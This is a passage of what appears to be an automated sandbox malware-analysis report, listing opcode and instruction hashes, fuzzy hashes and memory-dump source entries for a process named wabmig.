                                        • Opcode ID: a458256780d488892a3717b249061f275075b21f35e4a8e1ddbf47ff646f12ae
                                        • Instruction ID: 707353402baf811bb9f3efd54b88c83d8068e5aab0c42662db0ef45aac40490d
                                        • Opcode Fuzzy Hash: a458256780d488892a3717b249061f275075b21f35e4a8e1ddbf47ff646f12ae
                                        • Instruction Fuzzy Hash: C411F3B1C0065A9BCB10CFAAC545BDEFBF4AF48324F14816AD918A7240D779A944CFA5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PHfq
                                        • API String ID: 0-2154135885
                                        • Opcode ID: 287ade2d7458eff24be7ce799a07b56cee2a9e0df640bd27b3e19ba968657efa
                                        • Instruction ID: d7bf0744d3d48416ca9d8654dc987cccca014554e00bc78757221644983c012c
                                        • Opcode Fuzzy Hash: 287ade2d7458eff24be7ce799a07b56cee2a9e0df640bd27b3e19ba968657efa
                                        • Instruction Fuzzy Hash: ED418170E002499FDF15DF69C49469EBBB6EF85300F21496AE406EB380DF70998ACB95
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PHfq
                                        • API String ID: 0-2154135885
                                        • Opcode ID: 9e5be23cbcdb2c20f076cdf9ec39b6d5ecfe74f53bcd91c2c6010c2c145c8cb3
                                        • Instruction ID: a6fecdf608219bd86a70f25d42f7999526f65a2edac8f9bb9dcd89f2df50af1d
                                        • Opcode Fuzzy Hash: 9e5be23cbcdb2c20f076cdf9ec39b6d5ecfe74f53bcd91c2c6010c2c145c8cb3
                                        • Instruction Fuzzy Hash: DB31CF34B102018FCB09DB74C59465E7BA7EB89200F2589ADE406EB395EE35CD82CBE1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PHfq
                                        • API String ID: 0-2154135885
                                        • Opcode ID: b9c080d44de58256ff95edd92922d471ba268f123a64d977dec6b49dad8b5a89
                                        • Instruction ID: d58a1d652234f821d9260254801eb553dd0061cbed7ebe37c6bac408f1bda18e
                                        • Opcode Fuzzy Hash: b9c080d44de58256ff95edd92922d471ba268f123a64d977dec6b49dad8b5a89
                                        • Instruction Fuzzy Hash: DB319034B102058FCF099B74859465F7BABEB89600F2189A9E406EB395DE35DC42CBE5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $fq
                                        • API String ID: 0-12477121
                                        • Opcode ID: cf5b781955e0f1561d1c0e31ae5f448b3841b1b95ac025140e9dbc4d31201bf0
                                        • Instruction ID: be0df4a41d03d8e724c6f39cc0766873db562ebfe27de1a24c85730fda0d4ab7
                                        • Opcode Fuzzy Hash: cf5b781955e0f1561d1c0e31ae5f448b3841b1b95ac025140e9dbc4d31201bf0
                                        • Instruction Fuzzy Hash: 53F0A435A10121CBDF19CF58DB9056977ADEB44314F2240A6FD05DB241CE35DE02C791
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d6419ce6539e553f7f05dcd83479eb4a45aeac4aea97d07166f1347b2ab35a3e
                                        • Instruction ID: 7b57ac3207c21f5247b16f8db64acf8e47abeceba2bf2c7448e604b82d4fa6a8
                                        • Opcode Fuzzy Hash: d6419ce6539e553f7f05dcd83479eb4a45aeac4aea97d07166f1347b2ab35a3e
                                        • Instruction Fuzzy Hash: B6A164B4F101098BEF14CBA8C4A479E77BAEB89310F314469F506E739ADE38DD819B51
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9bb3724cf1592538ba86fc934235536f2eddc052682691c42449dd6827636796
                                        • Instruction ID: 16ca1614881d6e565dc943fabeac1e6f07825f06fee2e69bf3a9cad7f27a1a6a
                                        • Opcode Fuzzy Hash: 9bb3724cf1592538ba86fc934235536f2eddc052682691c42449dd6827636796
                                        • Instruction Fuzzy Hash: 64A16CB0E1020A8BDB10CB58C5A0B9DB7F6FB45314F2185A6F41AEB35ADF34D981CB91
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f369588b0afd9c0b71f5738774ed2cf5e7dd2f3e5ffe2466f826b4fdccffaf75
                                        • Instruction ID: c77857084ace5b4d293494c05f4a0a600cf94488756528e6eb0c8b977c2a6b59
                                        • Opcode Fuzzy Hash: f369588b0afd9c0b71f5738774ed2cf5e7dd2f3e5ffe2466f826b4fdccffaf75
                                        • Instruction Fuzzy Hash: 31618F72F005224BDB05DA6ECC8455FAAEBAF84220B254479E80EDB375DE76ED0287D1
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d2299c5d1c3e1ec4e84da1b9f651c99b749d55ec8320360556ed7e197a9bf7a1
                                        • Instruction ID: f3c2162ef9f6202fbff7182c7b3146b19d78e75f9300592f1e9c7ec8251b4b0a
                                        • Opcode Fuzzy Hash: d2299c5d1c3e1ec4e84da1b9f651c99b749d55ec8320360556ed7e197a9bf7a1
                                        • Instruction Fuzzy Hash: C1812B34B002098BDF44DFA8C59479EB7B6EF89700F218569E40AEB359EE34DD428B91
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e54846298ded358c32541aecdee85eed06259d4cb6bc987996916ca8a571bbd4
                                        • Instruction ID: e45f3abbc73ce7ec5309387f8ce82ae4d8b140c93dba91720a687a04995d8b13
                                        • Opcode Fuzzy Hash: e54846298ded358c32541aecdee85eed06259d4cb6bc987996916ca8a571bbd4
                                        • Instruction Fuzzy Hash: C0913E74E002198BDB51DF68C890B8DB7B1FF8A300F218599E549FB395DB70AA85CF51
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d64b59df5101c4a80b0065a22e9a4fc228792c841e1e7e01ecfdcf1d9f810900
                                        • Instruction ID: fe9df3a1add991736a3388c9746b39759790bf5981bfa0ca475e6271834e83c3
                                        • Opcode Fuzzy Hash: d64b59df5101c4a80b0065a22e9a4fc228792c841e1e7e01ecfdcf1d9f810900
                                        • Instruction Fuzzy Hash: 7F914F74E006198BDF50DF68C890B9DB7B1FF89300F208599E549BB355DB70AA85CF91
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6a21c070ac18e557922702ce5b232d5eba4ea562e26c034d83a93233105b4fd5
                                        • Instruction ID: f490c16feffdaf887405807d83863487cf04da6e90c90a144d9d2c4bc57833a5
                                        • Opcode Fuzzy Hash: 6a21c070ac18e557922702ce5b232d5eba4ea562e26c034d83a93233105b4fd5
                                        • Instruction Fuzzy Hash: 2171FC70E002498FDB15DFA8C9C0A9DBBFAFF88300F258569E405AB355DB31E946CB90
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9523502f31539260173ca163ac6b901e91238dbadc98bdbe789e7973d03cf9cb
                                        • Instruction ID: f7ae7fc9a27acdcacd10b7aeca3e929b42d670637bfbc0642bbca987f78603f0
                                        • Opcode Fuzzy Hash: 9523502f31539260173ca163ac6b901e91238dbadc98bdbe789e7973d03cf9cb
                                        • Instruction Fuzzy Hash: DD71FA70E002499FDB04DFA9C9D0A9DBBFAEF88300F258569E405AB355DB31ED46CB91
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: db7f6037516c6549bcc96403ef06b9ae78989544a7506c2fb681c11c53394981
                                        • Instruction ID: 45ed6b687f581e93bbc7f7678eedbb7c83abad5465925289f8cf2b4082ff2521
                                        • Opcode Fuzzy Hash: db7f6037516c6549bcc96403ef06b9ae78989544a7506c2fb681c11c53394981
                                        • Instruction Fuzzy Hash: EA51B131E00109DFCB14EB78E4847ADBBB6EF89321F2188AAE116D7255DF359959CF80
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0667f46cfc0c16468d9de61ad4ceed91db601aaecd7defa1c185ac8b53e467e2
                                        • Instruction ID: ed148b815222d52b40c5109911e47d2b5235997a7057f0738f280fe36a77a52b
                                        • Opcode Fuzzy Hash: 0667f46cfc0c16468d9de61ad4ceed91db601aaecd7defa1c185ac8b53e467e2
                                        • Instruction Fuzzy Hash: B951D670F201148BEB149ABCC89475F365EDB89320F30446AFA4BD7395DE68CD415BA2
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ccd56f458f6898afc8befa804234050d65f22aee7b1f1ee072cf9aa685619d8f
                                        • Instruction ID: 94eebfa8eecedd05908b7b2f1f9427c70506b61601fadb7f3dd74c5d602970ca
                                        • Opcode Fuzzy Hash: ccd56f458f6898afc8befa804234050d65f22aee7b1f1ee072cf9aa685619d8f
                                        • Instruction Fuzzy Hash: ED518170F201148BEF1496BCC894B5F365EDB89320F31446AFA0BD7395DE68DD815BA2
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 84f26bf958126cb3b4109f8db2aa2d9d18e849ba47a03706f1904148ef38cde2
                                        • Instruction ID: 17251bc9cfee0eccfe4e9946b4dcf84bea32e0634fb5017d210b88f6f8da540e
                                        • Opcode Fuzzy Hash: 84f26bf958126cb3b4109f8db2aa2d9d18e849ba47a03706f1904148ef38cde2
                                        • Instruction Fuzzy Hash: F1418271E007099FDB20CEA9D8C0AAFF7F6FB84310F21496AE156D7652DB30E9458B91
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 16dbfed2aadc62d6a84302a00d91fcd829f302b89db0216e110a44237ccf876b
                                        • Instruction ID: 8fd287c5b49631cf2e392c728bb0a13440f9a4e6ab6c4f5a5efa2c96e0ab52b9
                                        • Opcode Fuzzy Hash: 16dbfed2aadc62d6a84302a00d91fcd829f302b89db0216e110a44237ccf876b
                                        • Instruction Fuzzy Hash: 5A315B31F002058FCB19CF68C99469EF7B6AF89300F21C56AE916EB350DB71A982CB50
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f9482447221446487120ba62a42395c8698775a8cc2858fa0a21486dfd5cbe11
                                        • Instruction ID: d284ee84272e6d1fbdc743771c9d3981022ab990065b7bbcebfd2dbd997f6c70
                                        • Opcode Fuzzy Hash: f9482447221446487120ba62a42395c8698775a8cc2858fa0a21486dfd5cbe11
                                        • Instruction Fuzzy Hash: 45315C31E102059BCB09CF64C99469FF7B6AF89300F21C56AE916E7350DB71AD82CB50
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 321aba58e5c0bc5087aeb638bd2dae6a5e09771b5ecafb30fa520de1dd68a2b1
                                        • Instruction ID: 58fd3c758254a1b4f56f3805c1f08d2b9cf268aa59ecfa0f382cd705884ff195
                                        • Opcode Fuzzy Hash: 321aba58e5c0bc5087aeb638bd2dae6a5e09771b5ecafb30fa520de1dd68a2b1
                                        • Instruction Fuzzy Hash: E6215775E002159FDB11CFB9D984A9EBBF5EB48310F11856AF919E7390EB38D9018B90
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 04214ca5b3b61e9d7071efebbff9150a909ccae69784a04709dd7aac84574d47
                                        • Instruction ID: 71a704bac0cc25f63f1db851901399cbcaea1d2eafaffa6bb565e4f192a5ea19
                                        • Opcode Fuzzy Hash: 04214ca5b3b61e9d7071efebbff9150a909ccae69784a04709dd7aac84574d47
                                        • Instruction Fuzzy Hash: 84214A75E006199FDB01CFB9D984A9EBBF5FB48710F118069F905E7350EB34D9418B90
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2927796075.00000000026AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026AD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26ad000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 858a295f627f003e00e0484f89e09a11c7fe22675a705c660a54da3a15891bb2
                                        • Instruction ID: 0ec1de568a8ac0c9ce79e20f6a5813047c54fe5317c8c9bc2c688245a5fa0588
                                        • Opcode Fuzzy Hash: 858a295f627f003e00e0484f89e09a11c7fe22675a705c660a54da3a15891bb2
                                        • Instruction Fuzzy Hash: C12122B1504280DFDB14DF14D9D1B26BBA5EB84314F24C56DD84A4B742C33AD847CF62
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e9efda32d174e5a1ebfc96022cccb859bd9f7c8bda66ec1908ef7207a280f962
                                        • Instruction ID: 81b8152af0cbc709db6859ada448738862237dff08a44cc0cc629dbd34f62c6a
                                        • Opcode Fuzzy Hash: e9efda32d174e5a1ebfc96022cccb859bd9f7c8bda66ec1908ef7207a280f962
                                        • Instruction Fuzzy Hash: AD21D230F101158BCF18DA6CE99469EB7B7EF84310F218469F806EB351EE31EE418B80
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e64c6facdca8cfd9220826387b232835cb136d8a419da3cfb637aca34f836979
                                        • Instruction ID: 053c913339d9c2e6fda8c773fce1fdfe4066c623e609919344e854e2b36cfc00
                                        • Opcode Fuzzy Hash: e64c6facdca8cfd9220826387b232835cb136d8a419da3cfb637aca34f836979
                                        • Instruction Fuzzy Hash: 9211A135B001294FCF54D66DD854AAEB3FAEBC8611F11857AE50AE7358EE38DD018BD0
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7289773bbd478c63eaff9e986ac816d9e2925e53066c7fb513452f33eeb19f89
                                        • Instruction ID: 38be8e9a708cef33804d854885d6275bff3e8f9d55d4fd13663ddc48e750382a
                                        • Opcode Fuzzy Hash: 7289773bbd478c63eaff9e986ac816d9e2925e53066c7fb513452f33eeb19f89
                                        • Instruction Fuzzy Hash: DF115E71A006059FCB20DFA9DCC4AAFFBB2FF98300F104929E15597551D731A945CB80
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7c3eafb191f2fad83fd774f43bee181d2193641cb6dc2c27dc6695ef4a1cc745
                                        • Instruction ID: 1143116ca5860afbf2bbafaa6d4795f1d15a4dfbf991560feb1d206a1bbab4a8
                                        • Opcode Fuzzy Hash: 7c3eafb191f2fad83fd774f43bee181d2193641cb6dc2c27dc6695ef4a1cc745
                                        • Instruction Fuzzy Hash: B9012623B142204BE303C66D9CE07E63B9ADB82662F1940A3F04AC7251ED1BDD0B43C2
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5f2917436d3321d53f037ef6e398b7d437ff01666d4bb61e88845f931344b04f
                                        • Instruction ID: 61ce61a7349578526bd57dda262bb9b237919f6f6bbbadbc36d583395273f356
                                        • Opcode Fuzzy Hash: 5f2917436d3321d53f037ef6e398b7d437ff01666d4bb61e88845f931344b04f
                                        • Instruction Fuzzy Hash: 7201F130B001100FDB65DA7C864579EB7DBDFCAB14F28886AE00AE7756DE65CD028791
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2927796075.00000000026AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026AD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26ad000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d9635a159c96cd912face1ed134f520875c823d0ccfba5c312da3156d299c9d3
                                        • Instruction ID: 9a1a2605e1f51e597e9f6a6bdcae018ebd7973abb5dcfcc71f5240621e0b25db
                                        • Opcode Fuzzy Hash: d9635a159c96cd912face1ed134f520875c823d0ccfba5c312da3156d299c9d3
                                        • Instruction Fuzzy Hash: 7C11BB75504280CFCB11CF14D5D0B15BBA2FB84318F28C6AAD8494BB56C33AD84ACF62
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bf3441a98523340fcb32758959fdec322d341cbf0f0332580a93ccce071ba3bc
                                        • Instruction ID: 88fc33ca915af0a8236fa5fbd44ea77e21250d6e181287d70ecd2d1d3770735f
                                        • Opcode Fuzzy Hash: bf3441a98523340fcb32758959fdec322d341cbf0f0332580a93ccce071ba3bc
                                        • Instruction Fuzzy Hash: 3101F135B000294BDF14DA68DC146DEB3EAEBC8310F10043AE506E7288FF248D1187D2
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d6bcaac90ba9d209c926979d7a6e906ef24d9feeb6aea8213bb186fe867cf9ec
                                        • Instruction ID: 6861f5bf85cd525512f7179344296721b35916919a5e82ca1908b527a0bbc026
                                        • Opcode Fuzzy Hash: d6bcaac90ba9d209c926979d7a6e906ef24d9feeb6aea8213bb186fe867cf9ec
                                        • Instruction Fuzzy Hash: 66016171E002199ACB14DBB9C8505DEF7FAEB89310F1185A9E509E7204EE31DA41CBD1
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cd37e152f2ca514b24f4f04209aad618084899c9d509a47d963a3458d884caae
                                        • Instruction ID: e53518e948443510a409a99f6ea2150d66254ef7bf162f6a92564850d4ca5e2c
                                        • Opcode Fuzzy Hash: cd37e152f2ca514b24f4f04209aad618084899c9d509a47d963a3458d884caae
                                        • Instruction Fuzzy Hash: ED018F31B105104BC72ADB6C959476E77DBEBC9720F25886EF50BC7341EE26ED068781
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3922d7cd2e397631a90d5ea17105840a52e6bbbff0119145ab500593308b8310
                                        • Instruction ID: 44525f0210cd60e4667ff39f3722e5267484b22e40b87ad8f571de7b34a02ed6
                                        • Opcode Fuzzy Hash: 3922d7cd2e397631a90d5ea17105840a52e6bbbff0119145ab500593308b8310
                                        • Instruction Fuzzy Hash: AA21D3B5D01259AFCB10CF9AD984ACEFFB4FB48324F10826AE918A7240D7746954CFA5
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e73b81066f2d7b77fcbdcd35e679a2657bba14a8161d18f996fd0e9bacd42ec8
                                        • Instruction ID: 151e8237dec1a33a76c5483ec4d93c1c48e47afcfb5ec23ac9ab3582a059d2c3
                                        • Opcode Fuzzy Hash: e73b81066f2d7b77fcbdcd35e679a2657bba14a8161d18f996fd0e9bacd42ec8
                                        • Instruction Fuzzy Hash: B011D3B1D01259AFCB00CF9AD885ACEFFB8FB48320F10812AE918A7300D7746550CFA5
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0a57e1de77b808659b79c80631d5e59d9dfce8ee1f5155dc8972282e6db457f7
                                        • Instruction ID: db65b35a5af8fd8248536cee1cddc0b4262e7eb59d7177aa1fe3b00668df0a95
                                        • Opcode Fuzzy Hash: 0a57e1de77b808659b79c80631d5e59d9dfce8ee1f5155dc8972282e6db457f7
                                        • Instruction Fuzzy Hash: 5301F230B000104FCB12CE7CC95475A7BE6EB8A714F2188A9F10FCB391EE29ED068795
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b9a953559b3ee530c175d6d168dead6b9add0076fa7517b252a1d4ed978a8be1
                                        • Instruction ID: f7441e1e753ed69b05de3cb211ce225748ef55bc96fe16c067567c372a68ac13
                                        • Opcode Fuzzy Hash: b9a953559b3ee530c175d6d168dead6b9add0076fa7517b252a1d4ed978a8be1
                                        • Instruction Fuzzy Hash: 7201AD30B001100BDB55EA6D864475EB2CEDBCAB24F25887AF10ED7755DE65DD024391
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8e2abaaac39fccefd670d8d2e61255144fcc049e1e066951924c1a2c26cd6b26
                                        • Instruction ID: 8714085f8cf9e862700821b2db269b298273437f581c3ece262b0fe67c92e517
                                        • Opcode Fuzzy Hash: 8e2abaaac39fccefd670d8d2e61255144fcc049e1e066951924c1a2c26cd6b26
                                        • Instruction Fuzzy Hash: A5016931B105141BCB1ADA6D949072EB2DFDBC9B20F25887AF50BC7341EE26ED0643D1
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8bf8b9d1a37a8a8235a98998a12c9f0788d86febddd2d22d2f617c472828fb9d
                                        • Instruction ID: 6db1e70473812d34b81a3c2e35c414d344281f95bbd0c519803277f4bd23f393
                                        • Opcode Fuzzy Hash: 8bf8b9d1a37a8a8235a98998a12c9f0788d86febddd2d22d2f617c472828fb9d
                                        • Instruction Fuzzy Hash: 1A018130B100144FC716DE6CC454B5A73DAEB89714F218979F50FD7385EE29ED024785
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
